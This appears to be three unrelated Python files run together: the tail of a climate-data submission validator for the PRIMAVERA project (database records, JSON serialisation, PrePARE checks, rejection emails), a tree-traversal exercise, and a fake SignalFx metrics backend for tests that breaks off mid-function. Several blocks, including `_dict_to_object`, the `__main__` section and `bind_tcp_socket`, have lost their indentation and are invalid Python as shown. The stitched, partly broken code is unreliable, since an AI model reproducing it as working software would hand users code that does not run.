                    variable_request__dimensions__icontains=plev_name
                )
                if plev_matches.count() == 1:
                    metadata['data_request'] = plev_matches[0]
                    metadata['variable'] = plev_matches[0].variable_request
                elif plev_matches.count() == 0:
                    msg = ('No data requests found with plev {} for file: {}.'.
                           format(plev_name, metadata['basename']))
                    logger.error(msg)
                    raise FileValidationError(msg)
                else:
                    msg = ('Multiple data requests found with plev {} for '
                           'file: {}.'.format(plev_name, metadata['basename']))
                    logger.error(msg)
                    raise FileValidationError(msg)
            else:
                msg = ('Unable to determine plev name: {}.'.
                       format(metadata['basename']))
                logger.error(msg)
                raise FileValidationError(msg)
def update_database_submission(validated_metadata, data_sub, files_online=True,
                               file_version=None):
    """
    Create entries in the database for the files in this submission.

    :param list validated_metadata: A list containing the metadata dictionary
        generated for each file
    :param pdata_app.models.DataSubmission data_sub: The data submission object
        to update.
    :param bool files_online: True if the files are online.
    :param str file_version: The version string to apply to each file, or
        None to derive one from the incoming directory name or today's date.
    :returns:
    """
    for data_file in validated_metadata:
        create_database_file_object(data_file, data_sub, files_online,
                                    file_version)
    # every file was created, so mark the submission as validated
    data_sub.status = STATUS_VALUES['VALIDATED']
    data_sub.save()
def read_json_file(filename):
    """
    Read a JSON file describing the files in this submission.

    Objects serialized by `_object_to_default` are converted back to database
    objects via the `_dict_to_object` hook.

    :param str filename: The name of the JSON file to read.
    :returns: a list of dictionaries containing the validated metadata
    """
    with open(filename) as json_file:
        metadata = json.load(json_file, object_hook=_dict_to_object)
    logger.debug('Metadata for {} files read from JSON file {}'.format(
        len(metadata), filename))
    return metadata
def write_json_file(validated_metadata, filename):
    """
    Write a JSON file describing the files in this submission.

    Database objects in the metadata are serialized via the
    `_object_to_default` hook.

    :param list validated_metadata: A list containing the metadata dictionary
        generated for each file
    :param str filename: The name of the JSON file to write the validated data
        to.
    """
    with open(filename, 'w') as json_file:
        json.dump(list(validated_metadata), json_file,
                  default=_object_to_default, indent=4)
    logger.debug('Metadata written to JSON file {}'.format(filename))
def create_database_file_object(metadata, data_submission, file_online=True,
                                file_version=None):
    """
    Create a database entry for a data file.

    :param dict metadata: This file's metadata.
    :param pdata_app.models.DataSubmission data_submission: The parent data
        submission.
    :param bool file_online: True if the file is online.
    :param str file_version: The version string to apply to each file. The
        string from the incoming directory name or the current date is used
        if a string isn't supplied.
    :raises SubmissionError: If the file already exists in the database with
        different metadata (django.db.utils.IntegrityError).
    :returns:
    """
    # get a fresh DB connection after exiting from parallel operation
    django.db.connections.close_all()

    time_units = Settings.get_solo().standard_time_units

    if file_version:
        version_string = file_version
    else:
        # find the version number from the date in the submission directory
        # path
        date_string = re.search(r'(?<=/incoming/)(\d{8})',
                                metadata['directory'])
        if date_string:
            date_string = date_string.group(0)
            version_string = 'v' + date_string
        else:
            # fall back to today's date
            today = datetime.datetime.utcnow()
            version_string = today.strftime('v%Y%m%d')

    # if the file isn't online (e.g. loaded from JSON) then directory is blank
    directory = metadata['directory'] if file_online else None

    # create a data file. If the file already exists in the database with
    # identical metadata then nothing happens. If the file exists but with
    # slightly different metadata then django.db.utils.IntegrityError is
    # raised
    try:
        data_file = DataFile.objects.create(
            name=metadata['basename'],
            incoming_name=metadata['basename'],
            incoming_directory=metadata['directory'],
            directory=directory, size=metadata['filesize'],
            project=metadata['project'],
            institute=metadata['institute'],
            climate_model=metadata['climate_model'],
            activity_id=metadata['activity_id'],
            experiment=metadata['experiment'],
            variable_request=metadata['variable'],
            data_request=metadata['data_request'],
            frequency=metadata['frequency'], rip_code=metadata['rip_code'],
            start_time=pdt2num(metadata['start_date'], time_units,
                               metadata['calendar']) if metadata['start_date']
            else None,
            end_time=pdt2num(metadata['end_date'], time_units,
                             metadata['calendar'], start_of_period=False) if
            metadata['start_date'] else None,
            time_units=time_units, calendar=metadata['calendar'],
            version=version_string,
            data_submission=data_submission, online=file_online,
            grid=metadata.get('grid'),
            tape_url=metadata.get('tape_url')
        )
    except django.db.utils.IntegrityError as exc:
        msg = ('Unable to submit file {}: {}'.format(metadata['basename'],
                                                     exc.__str__()))
        logger.error(msg)
        raise SubmissionError(msg)

    if metadata['checksum_value']:
        # the return value isn't needed; get_or_create just ensures that the
        # checksum row exists (the previous unused `checksum` binding removed)
        get_or_create(Checksum, data_file=data_file,
                      checksum_value=metadata['checksum_value'],
                      checksum_type=metadata['checksum_type'])
def move_rejected_files(submission_dir):
    """
    Move the entire submission to a rejected directory two levels up from the
    submission directory.

    :param str submission_dir:
    :returns: The path to the submission after the function has run.
    """
    rejected_dir = os.path.normpath(
        os.path.join(submission_dir, '..', '..', 'rejected'))
    try:
        if not os.path.exists(rejected_dir):
            os.mkdir(rejected_dir)
        shutil.move(submission_dir, rejected_dir)
    except (IOError, OSError):
        # leave the submission where it is and report the original path
        logger.error("Unable to move the directory. Leaving it in it's current "
                     "location")
        return submission_dir

    destination = os.path.join(
        rejected_dir, os.path.basename(os.path.abspath(submission_dir)))
    logger.error('Data submission moved to {}'.format(destination))
    return destination
def send_user_rejection_email(data_sub):
    """
    Send an email to the submission's creator warning them of validation
    failure.

    The message is not sent directly; it is queued as an EmailQueue object
    for later delivery.

    :param pdata_app.models.DataSubmission data_sub:
    """
    val_tool_url = ('http://proj.badc.rl.ac.uk/primavera-private/wiki/JASMIN/'
                    'HowTo#SoftwarepackagesinstalledonthePRIMAVERAworkspace')

    # the named contact person comes from the site-wide settings
    contact_user_id = Settings.get_solo().contact_user_id
    contact_user = User.objects.get(username=contact_user_id)
    contact_string = '{} {} ({})'.format(contact_user.first_name,
                                         contact_user.last_name,
                                         contact_user.email)

    msg = (
        'Dear {first_name} {surname},\n'
        '\n'
        'Your data submission in {incoming_dir} has failed validation and '
        'has been moved to {rejected_dir}.\n'
        '\n'
        'Please run the validation tool ({val_tool_url}) to check why this '
        'submission failed validation. Once the data is passing validation '
        'then please resubmit the corrected data.\n'
        '\n'
        'Please contact {contact_person} if you '
        'have any questions.\n'
        '\n'
        'Thanks,\n'
        '\n'
        '{friendly_name}'.format(
            first_name=data_sub.user.first_name, surname=data_sub.user.last_name,
            incoming_dir=data_sub.incoming_directory,
            rejected_dir=data_sub.directory, val_tool_url=val_tool_url,
            contact_person=contact_string,
            friendly_name=contact_user.first_name
        ))

    _email = EmailQueue.objects.create(
        recipient=data_sub.user,
        subject='[PRIMAVERA_DMT] Data submission failed validation',
        message=msg)
def send_admin_rejection_email(data_sub):
    """
    Send the admin user an email warning them that a submission failed due to
    a server problem (missing data request, etc).

    The message is queued as an EmailQueue object for later delivery.

    :param pdata_app.models.DataSubmission data_sub:
    """
    # NOTE(review): the "admin" recipient is taken from the contact_user_id
    # setting -- the same user send_user_rejection_email names as the contact
    # person; confirm this is intentional
    admin_user_id = Settings.get_solo().contact_user_id
    admin_user = User.objects.get(username=admin_user_id)

    msg = (
        'Data submission {} from incoming directory {} failed validation due '
        'to a SubmissionError being raised. Please run the validation script '
        'manually on this submission and correct the error.\n'
        '\n'
        'Thanks,\n'
        '\n'
        '{}'.format(data_sub.id, data_sub.incoming_directory,
                    admin_user.first_name)
    )

    _email = EmailQueue.objects.create(
        recipient=admin_user,
        subject=('[PRIMAVERA_DMT] Submission {} failed validation'.
                 format(data_sub.id)),
        message=msg
    )
def set_status_rejected(data_sub, rejected_dir):
    """
    Set the data submission's status to be rejected and update the path to
    point to where the data now lives.

    :param pdata_app.models.DataSubmission data_sub: The data submission object.
    :param str rejected_dir: The name of the directory that the rejected files
        have been moved to.
    """
    # the two field updates are independent; save once at the end
    data_sub.directory = rejected_dir
    data_sub.status = STATUS_VALUES['REJECTED']
    data_sub.save()
def add_tape_url(metadata, tape_base_url, submission_dir):
    """
    Add to each file's metadata its URL in the tape system. The URL is
    calculated by finding the file's path relative to the submission directory
    and appending this to the base URL.

    :param list metadata: a list the dictionary object corresponding to
        each file
    :param str tape_base_url: the top level url of the data in the tape system
    :param str submission_dir: the top-level directory of the submission
    """
    for entry in metadata:
        relative_dir = os.path.relpath(entry['directory'], submission_dir)
        entry['tape_url'] = '{}/{}'.format(tape_base_url, relative_dir)
def run_prepare(file_paths, num_processes):
    """
    Run PrePARE on each file in the submission. Any failures are reported
    as an error with the logging and an exception is raised at the end of
    processing if one or more files has failed.

    :param list file_paths: The paths of the files in the submission's
        directory.
    :param int num_processes: The number of processes to use in parallel.
    :raises SubmissionError: at the end of checking if one or more files has
        failed PrePARE's checks.
    """
    logger.debug('Starting PrePARE on {} files'.format(len(file_paths)))
    jobs = []
    manager = Manager()
    # file paths go to the workers through a shared queue; the event is set
    # by a worker when a file fails PrePARE
    params = manager.Queue()
    file_failed = manager.Event()
    # run in this process when num_processes is 1 (easier to debug)
    if num_processes != 1:
        for i in range(num_processes):
            p = Process(target=_run_prepare, args=(params, file_failed))
            jobs.append(p)
            p.start()
    # queue the work plus one None sentinel per worker
    for item in itertools.chain(file_paths, (None,) * num_processes):
        params.put(item)
    if num_processes == 1:
        _run_prepare(params, file_failed)
    else:
        for j in jobs:
            j.join()
    if file_failed.is_set():
        logger.error('Not all files passed PrePARE')
        raise SubmissionError()
    logger.debug('All files successfully checked by PrePARE')
def _contents_hdf_check(cube, metadata, max_size=MAX_DATA_INTEGRITY_SIZE):
    """
    Check that the entire data of the file can be read into memory without
    any errors. Corrupt files typically generate an HDF error. Files larger
    than `max_size` are not read and a warning is displayed. Most files are
    under this limit, but those over are excessively slow to validate.

    :param iris.cube.Cube cube: The cube to check
    :param dict metadata: Metadata obtained from the file
    :param int max_size: Files larger than this (in bytes) are not checked
    :returns: True if file read ok.
    :raises FileValidationError: If there was any problem reading the data.
    """
    file_path = os.path.join(metadata['directory'], metadata['basename'])
    if os.path.getsize(file_path) > max_size:
        # too big to sensibly read into memory; skip with a warning
        logger.warning('File {} is larger than {} bytes. File contents '
                       'reading check not run.'.format(metadata['basename'],
                                                       max_size))
        return True
    try:
        # forcing the lazy data to load reads every byte of the file
        _data = cube.data
    except Exception:
        raise FileValidationError(
            'Unable to read data from file {}.'.format(metadata['basename']))
    return True
def _run_prepare(params, file_failed):
    """
    Check a single file with PrePARE. This function is called in parallel by
    multiprocessing.

    :param multiprocessing.Manager.Queue params: A queue, with each item being
        the full path of a file in the submission to check.
    :param multiprocessing.Manager.Event file_failed: If set then one or more
        files has failed validation.
    """
    while True:
        file_path = params.get()
        # None is the sentinel telling this worker to exit
        if file_path is None:
            return
        # skip variables that were removed from the CMIP6 data request and
        # all PRIMAVERA-only tables
        skip_this_var = False
        for skip_var in SKIP_PREPARE_VARS:
            if skip_var in file_path:
                logger.debug('Skipping running PrePARE on {}'.
                             format(file_path))
                skip_this_var = True
                break
        if skip_this_var:
            continue
        # run_prepare.sh lives in the same directory as this script
        prepare_script = os.path.join(
            os.path.dirname(os.path.realpath(__file__)),
            'run_prepare.sh'
        )
        prep_res = subprocess.run([prepare_script, file_path],
                                  stdout=subprocess.PIPE)
        # a non-zero exit status means PrePARE rejected the file
        if prep_res.returncode:
            logger.error('File {} failed PrePARE\n{}'.
                         format(file_path, prep_res.stdout.decode('utf-8')))
            file_failed.set()
def _get_submission_object(submission_dir):
    """
    Fetch the single DataSubmission whose incoming directory is
    `submission_dir`.

    :param str submission_dir: The path of the submission's top level
        directory.
    :returns: The object corresponding to the submission.
    :rtype: pdata_app.models.DataSubmission
    :raises SubmissionError: If zero or more than one submissions match.
    """
    try:
        data_sub = DataSubmission.objects.get(incoming_directory=submission_dir)
    except django.core.exceptions.MultipleObjectsReturned:
        msg = 'Multiple DataSubmissions found for directory: {}'.format(
            submission_dir)
        logger.error(msg)
        raise SubmissionError(msg)
    except django.core.exceptions.ObjectDoesNotExist:
        msg = ('No DataSubmissions have been found in the database for '
               'directory: {}. Please create a submission through the web '
               'interface.'.format(submission_dir))
        logger.error(msg)
        raise SubmissionError(msg)

    return data_sub
def _guess_plev_name(metadata):
    """
    Guess the name of the plev in the data request dimensions.

    The number of levels in the file's 'plev' (or 'lev') dimension is mapped
    to the data request's name for that set of levels.

    :param dict metadata: The file's metadata dictionary.
    :returns: The name of the pressure levels from the data request or None
        if it can't be guessed.
    :rtype: str
    """
    rootgrp = Dataset(os.path.join(metadata['directory'],
                                   metadata['basename']))
    # close the netCDF file even if inspecting it raises (previously the
    # handle leaked when an exception fired before close())
    try:
        if 'plev' in rootgrp.dimensions:
            level_name = 'plev'
        elif 'lev' in rootgrp.dimensions:
            level_name = 'lev'
        else:
            level_name = None

        plev_val = None
        if level_name:
            # known level counts from the data request; anything else is None
            plev_val = {4: 'plev4', 7: 'plev7h', 27: 'plev27'}.get(
                len(rootgrp.dimensions[level_name]))
    finally:
        rootgrp.close()

    return plev_val
def _object_to_default(obj):
    """
    Convert known objects to a form that can be serialized by JSON.

    :param obj: The object to convert.
    :returns: A dictionary holding the class name, module and the keyword
        arguments needed by `_dict_to_object` to rebuild (or look up) the
        object.
    :raises TypeError: If `obj` is not one of the known classes. This is the
        contract that `json.dump` requires of a `default` function;
        previously unknown types fell through and were silently written as
        null.
    """
    if isinstance(obj, iris.time.PartialDateTime):
        obj_dict = {'__class__': obj.__class__.__name__,
                    '__module__': obj.__module__}
        # PartialDateTime's repr lists its keyword arguments,
        # e.g. PartialDateTime(year=2014, month=9); recover them by regex
        kwargs = {}
        for k, v in re.findall(r'(\w+)=(\d+)', repr(obj)):
            kwargs[k] = int(v)
        obj_dict['__kwargs__'] = kwargs
        return obj_dict
    elif isinstance(obj, (ActivityId, ClimateModel, Experiment, Institute,
                          Project)):
        # these models are uniquely identified by their short name
        obj_dict = {'__class__': obj.__class__.__name__,
                    '__module__': obj.__module__}
        obj_dict['__kwargs__'] = {'short_name': obj.short_name}
        return obj_dict
    elif isinstance(obj, VariableRequest):
        obj_dict = {'__class__': obj.__class__.__name__,
                    '__module__': obj.__module__}
        obj_dict['__kwargs__'] = {'table_name': obj.table_name,
                                  'cmor_name': obj.cmor_name}
        return obj_dict
    elif isinstance(obj, DataRequest):
        obj_dict = {'__class__': obj.__class__.__name__,
                    '__module__': obj.__module__}
        obj_dict['__kwargs__'] = {
            'variable_request__table_name': obj.variable_request.table_name,
            'variable_request__cmor_name': obj.variable_request.cmor_name,
            'institute__short_name': obj.institute.short_name,
            'climate_model__short_name': obj.climate_model.short_name,
            'experiment__short_name': obj.experiment.short_name,
            'rip_code': obj.rip_code
        }
        return obj_dict

    raise TypeError('Object of type {} is not JSON serializable'.
                    format(obj.__class__.__name__))
def _dict_to_object(dict_):
"""
Convert a dictionary to an object
"""
if '__class__' in dict_:
module = __import__(dict_['__module__'], fromlist=[dict_['__class__']])
klass = getattr(module, dict_['__class__'])
if dict_['__class__'] == 'PartialDateTime':
inst = klass(**dict_['__kwargs__'])
elif dict_['__class__'] in ('ActivityId', 'ClimateModel',
'Experiment', 'Institute', 'Project',
'VariableRequest', 'DataRequest'):
inst = match_one(klass, **dict_['__kwargs__'])
else:
msg = ('Cannot load from JSON files class {}'.
format(dict_['__class__']))
raise NotImplementedError(msg)
else:
inst = dict_
return inst
def parse_args():
    """
    Parse command-line arguments.

    :returns: The parsed arguments.
    :rtype: argparse.Namespace
    """
    parser = argparse.ArgumentParser(description='Validate and create a '
                                                 'PRIMAVERA data submission')
    parser.add_argument('directory', help="the submission's top-level "
                                          "directory")
    parser.add_argument('-j', '--mip_era', help='the mip_era that data is '
                                                'ultimately being submitted to '
                                                '(default: %(default)s)',
                        default='CMIP6')
    parser.add_argument('-f', '--file-format', help='the CMOR version of the '
                                                    'input netCDF files being '
                                                    'submitted (CMIP5 or CMIP6)'
                                                    ' (default: %(default)s)',
                        default='CMIP6')
    # -o and -i are mutually exclusive: either write validated metadata to
    # JSON or read previously validated metadata from JSON
    group = parser.add_mutually_exclusive_group()
    group.add_argument('-o', '--output', help='write the new entries to the '
                                              'JSON file specified rather '
                                              'than to the database', type=str)
    group.add_argument('-i', '--input', help='read the entries to add to the '
                                             'database from the JSON file '
                                             'specified rather than by '
                                             'validating files', type=str)
    parser.add_argument('-t', '--tape-base-url', help='add a tape url to each '
                        'file with the base being specified on the command line', type=str)
    parser.add_argument('-l', '--log-level', help='set logging level to one of '
                        'debug, info, warn (the default), or error')
    parser.add_argument('-p', '--processes', help='the number of parallel processes '
                        'to use (default: %(default)s)', default=8, type=int)
    parser.add_argument('-s', '--version-string', help='an optional version to '
                        'use on all files. If not specifed the string in the incoming '
                        'directory name or the current date is used', type=str)
    parser.add_argument('-r', '--relaxed', help='create a submission from '
                        'validated files, ignoring failed files (default behaviour is to only '
                        'create a submission when all files pass validation)', action='store_true')
    parser.add_argument('-v', '--validate_only', help='only validate the input, '
                        'do not create a data submission', action='store_true')
    parser.add_argument('-n', '--no-prepare', help="don't run PrePARE",
                        action='store_true')
    parser.add_argument('-d', '--data-limit', help='the maximum size of file '
                                                   '(in bytes) to load into '
                                                   'memory for an HDF '
                                                   'integrity check (default: '
                                                   '%(default)s)',
                        type=int, default=MAX_DATA_INTEGRITY_SIZE)
    parser.add_argument('--version', action='version',
                        version='%(prog)s {}'.format(__version__))
    args = parser.parse_args()

    return args
def main(args):
    """
    Main entry point.

    Either validates the files in the submission directory or reads
    previously validated metadata from a JSON file (-i). Then, depending on
    the options, stops after validation (-v), writes the metadata to JSON
    (-o) or creates the data submission in the database.

    :param argparse.Namespace args: The parsed command-line arguments.
    :raises SystemExit: status 1 on SubmissionError, status 0 when only
        validating.
    """
    if args.processes == 1 and not iris.__version__.startswith('1.'):
        # if not multiprocessing then limit the number of Dask threads
        # this can't seem to be limited when using multiprocessing
        dask.config.set(pool=ThreadPool(2))

    submission_dir = os.path.normpath(args.directory)
    logger.debug('Submission directory: %s', submission_dir)
    logger.debug('Project: %s', args.mip_era)
    logger.debug('Processes requested: %s', args.processes)

    try:
        if args.input:
            # metadata was validated in an earlier run and saved to JSON;
            # the files themselves are no longer online
            validated_metadata = read_json_file(args.input)
            data_sub = _get_submission_object(submission_dir)
            files_online = False
        else:
            files_online = True
            data_files = list_files(submission_dir)

            logger.debug('%s files identified', len(data_files))

            if not args.validate_only and not args.output:
                data_sub = _get_submission_object(submission_dir)

                if data_sub.status != 'ARRIVED':
                    msg = "The submission's status is not ARRIVED."
                    logger.error(msg)
                    raise SubmissionError(msg)

            try:
                if not args.no_prepare:
                    run_prepare(data_files, args.processes)
                validated_metadata = list(identify_and_validate(
                    data_files, args.mip_era, args.processes,
                    args.file_format))
            except SubmissionError:
                # only warn the admin if a database submission was going to
                # be made
                if not args.validate_only and not args.output:
                    send_admin_rejection_email(data_sub)
                raise

            logger.debug('%s files validated successfully',
                         len(validated_metadata))

            if args.validate_only:
                logger.debug('Data submission not run (-v option specified)')
                logger.debug('Processing complete')
                sys.exit(0)

            if not args.relaxed and len(validated_metadata) != len(data_files):
                # if not args.output:
                #     rejected_dir = move_rejected_files(submission_dir)
                #     set_status_rejected(data_sub, rejected_dir)
                #     send_user_rejection_email(data_sub)
                msg = ('Not all files passed validation. Please fix these '
                       'errors and then re-run this script.')
                logger.error(msg)
                raise SubmissionError(msg)

        if args.tape_base_url:
            add_tape_url(validated_metadata, args.tape_base_url,
                         submission_dir)

        if args.output:
            write_json_file(validated_metadata, args.output)
        else:
            update_database_submission(validated_metadata, data_sub,
                                       files_online, args.version_string)
            logger.debug('%s files submitted successfully',
                         match_one(DataSubmission,
                                   incoming_directory=submission_dir).
                         get_data_files().count())
    except SubmissionError:
        sys.exit(1)

    logger.debug('Processing complete')
if __name__ == "__main__":
cmd_args = parse_args()
# determine the log level
if cmd_args.log_level:
try:
log_level = getattr(logging, cmd_args.log_level.upper())
except AttributeError:
logger.setLevel(logging.WARNING)
logger.error('log-level must be one of: debug, info, warn or error')
sys.exit(1)
else:
log_level = DEFAULT_LOG_LEVEL
# configure the logger
logging.config.dictConfig({
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': DEFAULT_LOG_FORMAT,
},
},
'handlers': {
'default': {
'level': log_level,
'class': 'logging.StreamHandler',
'formatter': 'standard'
},
},
'loggers': {
'': {
'handlers': ['default'],
'level': log_level,
'propagate': True
}
}
})
# run the code
main(cmd_args)
|
4_1_tree_traversal.py | # python3
import sys, threading
sys.setrecursionlimit(10**6) # max depth of recursion
threading.stack_size(2**27) # new thread will get stack of such size
class TreeOrders:
    """
    A binary tree read from stdin as parallel arrays of keys and child
    indices (-1 means "no child"); node 0 is the root.

    The three depth-first traversals are implemented iteratively with an
    explicit stack, so arbitrarily deep (degenerate) trees cannot overflow
    the interpreter's recursion limit, and an empty tree (n == 0) yields
    empty traversals instead of an IndexError.
    """

    def __init__(self):
        # input format: n, then n lines of "key left-index right-index"
        self.n = int(sys.stdin.readline())
        self.key = [0] * self.n
        self.left = [0] * self.n
        self.right = [0] * self.n
        for i in range(self.n):
            a, b, c = map(int, sys.stdin.readline().split())
            self.key[i] = a
            self.left[i] = b
            self.right[i] = c

    def in_order(self):
        """Return keys in left-root-right order (sorted for a BST)."""
        result = []
        stack = []
        node = 0 if self.n else -1
        while stack or node != -1:
            # walk down the left spine, stacking ancestors
            while node != -1:
                stack.append(node)
                node = self.left[node]
            node = stack.pop()
            result.append(self.key[node])
            node = self.right[node]
        self.result = result
        return result

    def pre_order(self):
        """Return keys in root-left-right order."""
        result = []
        if self.n:
            stack = [0]
            while stack:
                node = stack.pop()
                result.append(self.key[node])
                # push right first so that left is processed first
                if self.right[node] != -1:
                    stack.append(self.right[node])
                if self.left[node] != -1:
                    stack.append(self.left[node])
        self.result = result
        return result

    def post_order(self):
        """Return keys in left-right-root order."""
        # produce root-right-left (a mirrored pre-order) and reverse it
        result = []
        if self.n:
            stack = [0]
            while stack:
                node = stack.pop()
                result.append(self.key[node])
                if self.left[node] != -1:
                    stack.append(self.left[node])
                if self.right[node] != -1:
                    stack.append(self.right[node])
        result.reverse()
        self.result = result
        return result
def main():
    """Read the tree from stdin and print its three traversals."""
    tree = TreeOrders()
    for order in (tree.in_order(), tree.pre_order(), tree.post_order()):
        print(" ".join(str(key) for key in order))

# run in a worker thread, which was given a larger stack above
threading.Thread(target=main).start()
|
fake_backend.py | import asyncio
import gzip
import json
import socket
import sys
import threading
from collections import OrderedDict, defaultdict
from contextlib import contextmanager
from queue import Queue
from google.protobuf import json_format
from sanic import Sanic, response
from signalfx.generated_protocol_buffers import signal_fx_protocol_buffers_pb2 as sf_pbuf
# This module collects metrics from the agent and can echo them back out for
# making assertions on the collected metrics.
from tests.helpers.formatting import get_metric_type
STOP = type("STOP", (), {})
def bind_tcp_socket(host="127.0.0.1", port=0):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((host, port))
return (sock, sock.getsockname()[1])
# Fake the /v2/datapoint endpoint and just stick all of the metrics in a
# list
# pylint: disable=unused-variable
def _make_fake_ingest(datapoint_queue, events, spans, save_datapoints, save_events, save_spans):
    """
    Build a Sanic app that fakes the SignalFx ingest API.

    Datapoints are put on `datapoint_queue`, events are appended to `events`
    and trace spans to `spans`, each only when the corresponding save_* flag
    is true.
    """
    app = Sanic()

    @app.middleware("request")
    async def compress_request(request):
        # transparently decompress gzipped request bodies before the
        # handlers below parse them
        if "Content-Encoding" in request.headers:
            if "gzip" in request.headers["Content-Encoding"]:
                request.body = gzip.decompress(request.body)

    @app.post("/v2/datapoint")
    async def handle_datapoints(request):
        # NOTE(review): headers.get() returns None when the header is
        # missing, which would make the `in` test raise TypeError --
        # presumably the agent always sends a content-type; confirm
        is_json = "application/json" in request.headers.get("content-type")

        dp_upload = sf_pbuf.DataPointUploadMessage()
        if is_json:
            json_format.Parse(request.body, dp_upload)
        else:
            # otherwise assume protobuf wire format
            dp_upload.ParseFromString(request.body)

        if save_datapoints:
            datapoint_queue.put(dp_upload)
        return response.json("OK")

    @app.post("/v2/event")
    async def handle_event(request):
        is_json = "application/json" in request.headers.get("content-type")

        event_upload = sf_pbuf.EventUploadMessage()
        if is_json:
            json_format.Parse(request.body, event_upload)
        else:
            event_upload.ParseFromString(request.body)

        if save_events:
            events.extend(event_upload.events)  # pylint: disable=no-member
        return response.json("OK")

    @app.post("/v1/trace")
    async def handle_trace(request):
        # spans arrive as plain JSON
        if save_spans:
            spans.extend(request.json)
        return response.json("OK")

    return app
# Fake the dimension PUT method to capture dimension property/tag updates.
# pylint: disable=unused-variable
def _make_fake_dimension_api(app, dims):
    """Register fake dimension GET/PUT/PATCH endpoints on *app*.

    *dims* is a nested mapping: ``dims[key][value]`` ->
    ``{"customProperties": {...}, "tags": [...]}``.
    """
    @app.get("/v2/dimension/<key>/<value>")
    async def get_dim(_, key, value):
        dim = dims.get(key, {}).get(value)
        if not dim:
            return response.json({}, status=404)
        return response.json(
            {"key": key, "value": value, "customProperties": dim.get("customProperties"), "tags": dim.get("tags")}
        )

    @app.put("/v2/dimension/<key>/<value>")
    async def put_dim(request, key, value):
        # PUT replaces the dimension wholesale.
        content = request.json
        dims[key][value] = content
        return response.json({})

    @app.patch("/v2/dimension/<key>/<value>/_/sfxagent")
    async def patch_dim(request, key, value):
        content = request.json
        # The API won't accept these on this endpoint so make sure they aren't
        # present
        assert content.get("key") is None
        assert content.get("value") is None
        content["key"] = key
        content["value"] = value
        # A null property value means "delete this property".
        props_to_add = content.get("customProperties", {})
        prop_keys_to_delete = [k for k, v in props_to_add.items() if v is None]
        for k in prop_keys_to_delete:
            del props_to_add[k]
        existing = dims[key].get(value)
        if not existing:
            dims[key][value] = {"customProperties": props_to_add, "tags": content.get("tags", [])}
            return response.json({})
        existing_props = existing.get("customProperties", {})
        existing_props.update(props_to_add)
        existing["customProperties"] = existing_props
        for k in prop_keys_to_delete:
            # Bug fix: deleting a property that was never set used to raise
            # KeyError; pop() makes deletion idempotent.
            existing_props.pop(k, None)
        existing_tags = existing.get("tags", [])
        existing_tags.extend(content.get("tags", []))
        existing["tags"] = existing_tags
        for tag in content.get("tagsToRemove", []):
            # Bug fix: removing a tag that isn't present used to raise ValueError.
            if tag in existing_tags:
                existing_tags.remove(tag)
        return response.json(existing)

    return app
def _make_fake_correlation_api(app, dims):
    """Register fake APM correlation endpoints on *app*.

    Correlations are stored in the same *dims* mapping under the keys
    ``sf_services`` and ``sf_environments``.
    """
    @app.put("/v2/apm/correlate/<key>/<value>/service")
    async def put_service(request, key, value):
        service = request.body.decode("utf-8")
        dim = dims.get(key, {}).get(value)
        if not dim:
            dims[key] = {value: {}}
            dims[key][value] = {"sf_services": [service]}
        elif key in ("kubernetes_pod_uid", "container_id"):
            # Pods/containers are correlated to exactly one service.
            dims[key][value]["sf_services"] = [service]
        else:
            dim_services = dim.get("sf_services")
            if not dim_services:
                dim_services = [service]
            else:
                dim_services.append(service)
            dims[key][value]["sf_services"] = dim_services
        return response.json({})

    @app.put("/v2/apm/correlate/<key>/<value>/environment")
    async def put_environment(request, key, value):
        environment = request.body.decode("utf-8")
        dim = dims.get(key, {}).get(value)
        if not dim:
            dims[key] = {value: {}}
            dims[key][value] = {"sf_environments": [environment]}
        elif key in ("kubernetes_pod_uid", "container_id"):
            # Pods/containers are correlated to exactly one environment.
            dims[key][value]["sf_environments"] = [environment]
        else:
            dim_environments = dim.get("sf_environments")
            if not dim_environments:
                dim_environments = [environment]
            else:
                dim_environments.append(environment)
            dims[key][value]["sf_environments"] = dim_environments
        return response.json({})

    @app.delete("/v2/apm/correlate/<key>/<value>/service/<prop_value>")
    async def delete_service(_, key, value, prop_value):
        dim = dims.get(key, {}).get(value)
        if not dim:
            return response.json({})
        # Bug fix: sf_services may be unset (None); guard before membership
        # test to avoid `in None` TypeError.
        services = dim.get("sf_services") or []
        if prop_value in services:
            services.remove(prop_value)
        dim["sf_services"] = services
        return response.json({})

    @app.delete("/v2/apm/correlate/<key>/<value>/environment/<prop_value>")
    async def delete_environment(_, key, value, prop_value):
        dim = dims.get(key, {}).get(value)
        if not dim:
            return response.json({})
        # Same missing-key guard as delete_service.
        environments = dim.get("sf_environments") or []
        if prop_value in environments:
            environments.remove(prop_value)
        dim["sf_environments"] = environments
        return response.json({})

    @app.get("/v2/apm/correlate/<key>/<value>")
    async def get_correlation(_, key, value):
        dim = dims.get(key, {}).get(value)
        if not dim:
            return response.json({})
        props = {}
        # Bug fix: a dim correlated to only a service (or only an environment)
        # used to raise KeyError on direct indexing; use .get() instead.
        services = dim.get("sf_services")
        if services:
            props["sf_services"] = services
        environments = dim.get("sf_environments")
        if environments:
            props["sf_environments"] = environments
        return response.json(props)

    return app
# Starts up a new set of backend services that will run on a random port. The
# returned object will have properties on it for datapoints, events, and dims.
# The fake servers will be stopped once the context manager block is exited.
# pylint: disable=too-many-locals,too-many-statements
@contextmanager
def start(ip_addr="127.0.0.1", ingest_port=0, api_port=0, save_datapoints=True, save_events=True, save_spans=True):
    """Start fake ingest + API servers on *ip_addr* and yield a FakeBackend handle.

    Each server runs on its own asyncio event loop in its own thread; a third
    thread drains the datapoint queue into the shared lists.  Everything is
    torn down when the context-manager block exits.
    """
    # Data structures are thread-safe due to the GIL
    _dp_upload_queue = Queue()
    _datapoints = []
    _datapoints_by_metric = defaultdict(list)
    _datapoints_by_dim = defaultdict(list)
    _events = []
    _spans = []
    _dims = defaultdict(defaultdict)
    ingest_app = _make_fake_ingest(_dp_upload_queue, _events, _spans, save_datapoints, save_events, save_spans)
    api_app = Sanic()
    api_app = _make_fake_dimension_api(api_app, _dims)
    api_app = _make_fake_correlation_api(api_app, _dims)
    # Bind first so the assigned ephemeral ports are known before serving.
    [ingest_sock, _ingest_port] = bind_tcp_socket(ip_addr, ingest_port)
    [api_sock, _api_port] = bind_tcp_socket(ip_addr, api_port)
    ingest_loop = asyncio.new_event_loop()
    async def start_ingest_server():
        # Very long timeouts so slow tests don't have connections reaped.
